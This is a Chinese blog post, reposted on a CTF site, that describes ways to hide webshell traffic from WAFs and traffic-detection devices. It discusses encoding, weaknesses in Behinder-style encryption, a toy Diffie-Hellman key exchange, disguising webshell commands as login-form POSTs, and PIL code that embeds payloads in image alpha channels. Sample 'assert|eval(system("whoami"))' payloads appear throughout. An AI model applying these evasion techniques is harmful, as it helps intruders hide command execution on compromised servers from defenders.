浅谈几种绕过流量检测的方法

渗透技巧 2年前 (2022) admin
592 0 0

近几年做渗透测试的时候总是遇到流量特征太明显而被拦截甚至封IP的情况,每次都要耗半天劲去想办法,甚至尝试过改造蚁剑的编码器,奈何NodeJS的功底太差(甚者可以说不会)写到一半就烂尾了。于是就开始自己用Python写了个简单WebShell管理器来绕过流量检测,当然这东西都是后话,这个文章主要还是为分享一下自己的一些绕过思路。

前言:

  1. 本文大概3000字,请合理分配阅读时间。
  2. 本文中的代码为了用来演示而写的,不代表最后的成品脚本。
  3. 此文中的所有方法以客户端和服务器中间的WAF不知道服务器上Web Shell的文件内容为前提。
  4. 此文当中默认当web shel是免杀,所以不考虑shell被杀的问题。

一、编码

编码是最常见的绕过方式,像蚁剑这种就是使用编码的典型工具。常见的编码也就是base64URLHexUnicode之类的了,所以编码这块儿本文不再过多阐述。

二、加密

加密也是常用的绕过流量检测的方法,比如冰蝎、哥斯拉这两个web shell管理工具就是使用加密来绕过流量检测(虽然说现在会被拦截了,但是刚发布的时候是还是很稳的)。常用的加密方式一般是XORAES等对称加密方式(这里暂时不考虑RSA这种非对称加密,这东西简直是bug一般的存在)。这种对称加密有个很大的弊端:

  1. 动态的密钥会在HTTP包里泄露。
  2. 静态密钥容易被机器学会特征。

1、动态的密钥会在HTTP包里泄露

以冰蝎的动态密钥为例:

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=s9e7ldh4sogigtbuq4u8hqnr14; path=/
Connection: close
Content-Type: text/html
Content-Length: 16

3f2a8ede95042ddc

这个是第一次请求时交换的密钥,之后就会以3f2a8ede95042ddc来进行加解密,如下面这个POST

浅谈几种绕过流量检测的方法
冰蝎的响应信息

3f2a8ede95042ddc解密得到:

浅谈几种绕过流量检测的方法
解密冰蝎的响应信息

所以通过这个例子可以看到密钥是泄露在HTTP包里的。

2、静态密钥容易被机器学会特征

在使用一些对称加密算法会因为密码和前几个字节是固定的,导致加密后前几个字符也一直是固定的(部分编码也有这个特征),从而会被WAF给学会特征来拦截。以XORAES-ECB来举例:

import random
import string
from Crypto.Cipher import AES

key = 'this_is_key!!!!!'     # 用感叹号填充到16个字符,方便加密
regular_data = "assert|eval(base64_decode('%s'))"  # 以冰蝎的payload为例

def random_char(num):
    return ''.join(random.choices(string.ascii_letters, k=num))

def xor(text: str, key: str):
    result = ''
    for i in range(max(len(text), len(key))):
      result += chr(ord(text[i % len(text)]) ^ ord(key[i % len(key)]))
    return result

def aes_encrypt(text: str, key: str):
    aes = AES.new(key.encode(), AES.MODE_ECB)
    return aes.encrypt(text.encode())

for i in range(10):
    print(xor(regular_data % random_char(10), key).encode())
for i in range(10):
    print(aes_encrypt(regular_data % random_char(16 - (len(regular_data) - 2 + 10) % 16 + 10), key))

# XOR加密
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^mLl{qx12x10;+nNZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^@vk[Sx16?x10x18x14NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^PfLIF8-;'8NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^plBr{x0ctx05%x18NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^ictcix17x01x07x19'NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^kljxTx1ax0cx00x0b5NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^I{vBHx04x05!x17x12NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^uJ@NRx01+;nx16NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^gmDXlx06 /n-NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^MkvTmx05?x19x17<NZv'

# AES加密
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxecx8cx03x0c7xd8xe09>xcecUxc9xe4;x8a5xaaxc3xe2x08xcax99Ox1dGx99Wxd8x80vs'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa5xfaxcef5xeeMxb2x92xf3x02xf6x82>k`x82xd7d{x13x02Rxf9yxb697xc2x87x98x12'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSx83pxa5rxdaxf3x8bx99{x13Vxa8rx9dZxf4&35x03TxabxabxxdcN)x81xbdlx1ex03'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa3xf1xabxf1Zxb9xc1x98Lxc1Bx97xeeVx04xdaxbfeufxf9xa5T{[x07xc1[xcdxd9(xf2'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxc4oh"K!x1ax8dWx95\xfax8e^xbc@Yxaexe8x07x10(nX}ex00Ix8el_o'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSex97x17Gx7fx87xb0xa8x16E|xf3x17xbdx82x11'x8fxc9xb0bxb6xaaxd9xdbxffxb7Txd6x00xa0xa9"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxeexe3xd4wxafgkxf2xcdx89%x866xb3=(x9cxffjxe2x7fx98xb9x06jg]xccSx1fxabxe6'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSx1c.a'g>xbax9awTGx0bx16xef7x88xccx84x0fpxad.x0cL;x9dxd0cxfaxccva"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSoNx1c3xc0Hxc0Fx9cxf7xfbx96rx99x94xecIx1f{x90xc8xecx01,H(xcc vW&x1f'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aS4xd1x05xabDIx9a0x7fx98^xfdx80`/x81Ix0bXx8cxb7x10xc6x10xe5xb3x93rxcbxdfzx0c'

如上面的代码所示,可以看到不论是XOR还是AES加密,因为密钥和明文的前几个字符是固定的(AES要求一组为16字节,所以最少要16个字符是固定的才行,当然并不是所有的模式都这样,比如AES-CBC就不会),最后导致的就是前几个密文每次都一样,很容易被机器学习给学会特征

3、怎么办呢?

其实解决方法不难,那就是大名鼎鼎的Diffe-Hellman算法,这个算法一般用在密钥交换上,刚好可以用在这里。具体的算法如下图所示

浅谈几种绕过流量检测的方法
Diff-Hellman算法原理图

其中:abp都是素数,g任意。用代码尝试一下

import random

a = 13
b = 11
p = 7
g = random.randint(1020)
A = g ** a % p
B = g ** b % p
print(A ** b % p == B ** a % p)
# True

所以在实战环境中,服务端可以通过第一次请求获得的gpA来计算出K然后存到session当中并返回自己的B,这样不仅可以在后续的请求中直接使用K来进行加密通信而不被WAF发现的同时还可以随时更换密钥。

三、混淆

混淆也是躲避流量检测设备的有利方法之一,其鼻祖个人认为应该是ShadowSocksR了,它的混淆模式方便了许多人上网。至于SSR具体的原理这里先开个坑,若想了解可以上网搜索。在实际环境中使用加密是为了防止中间人截获我们原始的payload,虽然加密也能起到绕过流量检测设备的作用,但有时候也可能会因为频繁请求而被识别为恶意流量,这时候就需要将我们加密后的(或原始的)payload进行混淆来防止被流量检测设备识别。

1、根据网站原始页面进行流量仿造

一般网站正常情况下不是返回HTML和图片就是返回JSONXML(使用JS进行自加密发送的情况不考虑),所以可以提前定义好请求信息和响应信息,在后续的请求中按照格式去请求。举个例子,以登录页面为例,加入登录页面有一个登录接口,POSTusernamepassword,并且返回信息是一段HTML,则可以将Web Shell伪装成这个接口。则理想的请求信息应该如下:

请求信息:

POST /shell.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html
Connection: close

username=admin&password=assert%7Ceval%28%27system%28%22whoami%22%29%27%29&submit=%E7%99%BB%E9%99%86

响应信息:

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html

<html>
<head>
<script src="/static/js/jquery.js"></script>
<title>登录</title>
</head>
<body>
<div class="form-control">
<p class="form-error">NT AUTHORITYSYSTEM</p>
<form class="form-block" action="/shell.php" method="post">
<input class="input-block" type="text" name="username" />
<input class="input-block" type="password" name="password" />
<input class="input-block" type="submit" name="submit" value="登录" />
</form>
</div>
</body>
</html>

根据上面的请求信息和响应信息,不难看出shell的链接密码是password,而返回的结果是<p>NT AUTHORITYSYSTEM</p>,也就是包裹在了原来本应该显示错误信息的地方,这样就做到了上面说到的仿造正常页面。

2、隐写

隐写是我在CTF当中经常遇到的东西,可以利用其思路将payload的每个字符写入到图片的每个字符当中,其中需要处理的问题是如果payload不够长会填不满图片或者payload过长导致图片不够写。后面的情况可以通过更换更大的图片来变为第一种情况。

而第一种情况则需要填充,我个人偏向于先将payload使用base64编码,消除掉不可见字符,然后再使用不可见字符(如x00xff等),服务端获取后直接剔除不可见字符再base64解码即可。

以本公众号的logo为例,通过PIL库可以将payload写入到图片的每个像素中的alpha通道中,也就是透明度。

一个使用16位存储的图片,5位表示红色,5位表示绿色,5位表示蓝色,1位是阿尔法。在这种情况下,Alpha值只能为0或1,要么透明,要么不透明;

一个使用32位存储的图片,每8位表示红绿蓝和阿尔法通道。在这种情况下,Alpha通道不只可以表示透明还是不透明,还可以表示256种不同的透明度。

所以我们这里用32位存储的图片。代码如下:

from PIL import Image

payload = 'aseert|eval('system("whoami")')' + ';' * (1200 * 1000)  # 填充脏数据,只为了演示
image = 'logo.png'

img = Image.open(image)
img = img.convert('RGBA')
x, y = img.size

# 确保图片的像素点放得下payload
assert x * y >= len(payload)

# 填充payload到图片像素点的数量
payload = payload + 'x00' * (x * y - len(payload))

for i in range(x):
    for j in range(y):
        color = img.getpixel((i, j))
        new_color = color[:-1] + (ord(payload[i * x + j]), )
        img.putpixel((i, j), new_color)
img.show()
img.save('anioner.png')

这个代码即可做到将字符串隐写到图片当中,效果如下:

浅谈几种绕过流量检测的方法
右侧为原始图片,左侧为隐写后的图片

如何解密呢?那就是反向操作把RGBA取出来然后把A转成字符串即可。

总结

实际上,上面的那些绕过方式还是有问题的,这里列举一些各自的优缺点。

  1. Diffe-Hellman算法

    1. 优点:

      1、能够有效防止中间人获取到密钥从而解密流量

    2. 缺点:

      1、那些素数过小时会导致很容易就被爆破出来密钥

      2、如果素数过大(哪怕是3位整数)会导致整型溢出而计算错误

      3、需要额外一次请求来获取密钥,增加了特征

  2. 页面仿造

    1. 优点:

      1、增加判断难度,尤其是在配合了加密后

      2、管理员的溯源难度增加那么一丢丢

    2. 缺点:

      1、过多的增加了原来的数据大小,网络环境差时会导致传输很慢的问题

      2、若原始的payload未进行加密或编码依然会被检测出特征

  3. 图片隐写

    1. 优点:

      1、无法肉眼判断

      2、很少有WAF检测图片

      3、随时可以更换隐写载体,如视频、音频等

    2. 缺点:

      1、数据长度较原始payload增大了很多

      2、频繁的POST图片也是一个特征

      3、容易被提取,需要加密

其实绕过流量检测设备的方法很多,上面列举的只是我自己一堆想法中的几个,个人认为其中的Diffe-Hellman算法在解决了额外的一次请求之后应该是很无敌的存在。

原文始发于微信公众号(Anion的小黑屋):浅谈几种绕过流量检测的方法

版权声明:admin 发表于 2022年8月31日 上午11:46。
转载请注明:浅谈几种绕过流量检测的方法 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...